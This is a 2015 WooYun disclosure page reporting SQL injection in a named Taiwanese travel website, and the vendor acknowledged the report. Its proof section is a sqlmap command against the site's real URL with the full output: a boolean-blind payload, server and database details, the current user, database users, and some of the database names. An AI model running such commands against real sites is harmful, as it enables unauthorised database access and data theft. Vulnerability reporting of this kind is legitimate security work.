当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0103580

漏洞标题:台灣某旅遊網站SQL Injection

相关厂商:Hitcon台湾互联网漏洞报告平台

漏洞作者: 路人甲

提交时间:2015-03-26 15:43

修复时间:2015-05-13 04:08

公开时间:2015-05-13 04:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-26: 细节已通知厂商并且等待厂商处理中
2015-03-29: 厂商已经确认,细节仅向厂商公开
2015-04-08: 细节向核心白帽子及相关领域专家公开
2015-04-18: 细节向普通白帽子公开
2015-04-28: 细节向实习白帽子公开
2015-05-13: 细节向公众公开

简要描述:

RT

详细说明:

QQ截图20150325083256.png


QQ截图20150325083307.png


QQ截图20150325083321.png

漏洞证明:

[root@Hacker~]# Sqlmap Sqlmap sqlmap.py -u "http://www.mellowtour.com.tw/webobj/
NewPost/ShowPost.asp?id_no=9768&postClass=1" --dbs --passwords --current-user --
current-db --is-dba
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 07:58:13
[07:58:14] [INFO] testing connection to the target URL
[07:58:14] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[07:58:15] [INFO] target URL is stable
[07:58:15] [INFO] testing if GET parameter 'id_no' is dynamic
[07:58:16] [INFO] confirming that GET parameter 'id_no' is dynamic
[07:58:21] [WARNING] GET parameter 'id_no' does not appear dynamic
[07:58:22] [WARNING] heuristic (basic) test shows that GET parameter 'id_no' mig
ht not be injectable
[07:58:22] [INFO] testing for SQL injection on GET parameter 'id_no'
[07:58:22] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[07:58:23] [INFO] GET parameter 'id_no' is 'AND boolean-based blind - WHERE or H
AVING clause' injectable
[07:58:31] [INFO] heuristic (extended) test shows that the back-end DBMS could b
e 'Microsoft SQL Server'
do you want to include all tests for 'Microsoft SQL Server' extending provided l
evel (1) and risk (1)? [Y/n] Y
[07:58:41] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[07:58:41] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[07:58:41] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[07:58:41] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause (IN)'
[07:59:02] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[07:59:04] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[07:59:07] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or
HAVING clause'
[07:59:28] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[07:59:53] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[07:59:55] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or
HAVING clause (IN)'
[08:00:16] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[08:00:20] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter r
eplace'
[08:00:29] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter r
eplace (integer column)'
[08:00:30] [INFO] testing 'MySQL inline queries'
[08:00:30] [INFO] testing 'PostgreSQL inline queries'
[08:00:30] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[08:00:30] [INFO] testing 'Oracle inline queries'
[08:00:30] [INFO] testing 'SQLite inline queries'
[08:00:31] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[08:00:31] [CRITICAL] there is considerable lagging in connection response(s). P
lease use as high value for option '--time-sec' as possible (e.g. 10 or more)
[08:00:40] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[08:00:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[08:00:40] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[08:00:40] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[08:00:40] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[08:00:44] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (hea
vy query)'
[08:01:05] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[08:01:05] [WARNING] most probably web server instance hasn't recovered yet from
previous timed based payload. If the problem persists please wait for few minut
es and rerun without flag T in option '--technique' (e.g. '--flush-session --tec
hnique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec
=2')
[08:01:10] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (hea
vy query - comment)'
[08:01:10] [INFO] testing 'Oracle AND time-based blind'
[08:01:10] [INFO] testing 'Microsoft SQL Server/Sybase OR time-based blind (heav
y query)'
[08:01:40] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parame
ter replace'
[08:01:40] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parame
ter replace (heavy queries)'
[08:01:41] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[08:01:41] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[08:02:16] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[08:02:22] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[08:02:29] [INFO] checking if the injection point on GET parameter 'id_no' is a
false positive
GET parameter 'id_no' is vulnerable. Do you want to keep testing the others (if
any)? [y/N] N
sqlmap identified the following injection points with a total of 86 HTTP(s) requ
ests:
---
Place: GET
Parameter: id_no
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id_no=9768 AND 3961=3961&postClass=1
---
[08:17:59] [INFO] testing MySQL
[08:17:59] [WARNING] the back-end DBMS is not MySQL
[08:17:59] [INFO] testing Oracle
[08:17:59] [WARNING] the back-end DBMS is not Oracle
[08:17:59] [INFO] testing PostgreSQL
[08:18:00] [WARNING] the back-end DBMS is not PostgreSQL
[08:18:00] [INFO] testing Microsoft SQL Server
[08:18:00] [INFO] confirming Microsoft SQL Server
[08:18:13] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
[08:18:13] [INFO] fetching current user
[08:18:13] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[08:18:13] [INFO] retrieved: travel104
current user: 'travel104'
[08:19:25] [INFO] fetching current database
[08:19:25] [INFO] retrieved: BuyS
[08:20:10] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
ma
[08:20:47] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
r
[08:21:28] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[08:21:50] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[08:22:25] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[08:22:48] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[08:23:10] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
t
[08:23:32] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[08:24:04] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
current database: 'BuySmart'
[08:24:18] [INFO] testing if current user is DBA
[08:24:18] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
current user is DBA: False
[08:24:18] [INFO] fetching database users password hashes
[08:24:18] [INFO] fetching database users
[08:24:18] [INFO] fetching number of database users
[08:24:18] [INFO] retrieved:
[08:24:40] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
2
[08:24:42] [INFO] retrieved: sa
[08:25:15] [INFO] retrieved: travel10
[08:26:29] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[08:26:51] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
4
[08:27:06] [INFO] fetching number of password hashes for user 'sa'
[08:27:06] [INFO] retrieved:
[08:27:28] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
0
[08:27:39] [WARNING] unable to retrieve the number of password hashes for user '
sa'
[08:27:39] [INFO] fetching number of password hashes for user 'travel104'
[08:27:39] [INFO] retrieved: 0
[08:27:44] [WARNING] unable to retrieve the number of password hashes for user '
travel104'
[08:27:44] [ERROR] unable to retrieve the password hashes for the database users
(most probably because the session user has no read privileges over the relevan
t system database table)
[08:27:44] [INFO] fetching database names
[08:27:44] [INFO] fetching number of databases
[08:27:44] [INFO] retrieved: 13
[08:27:59] [INFO] retrieved: 931.tra
[08:29:19] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
velnet.co
[08:31:14] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
m.tw
[08:31:38] [INFO] retrieved: AirChina
[08:32:24] [INFO] retrieved: BuySma

修复方案:

null

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-03-29 04:07

厂商回复:

感謝通報

最新状态:

暂无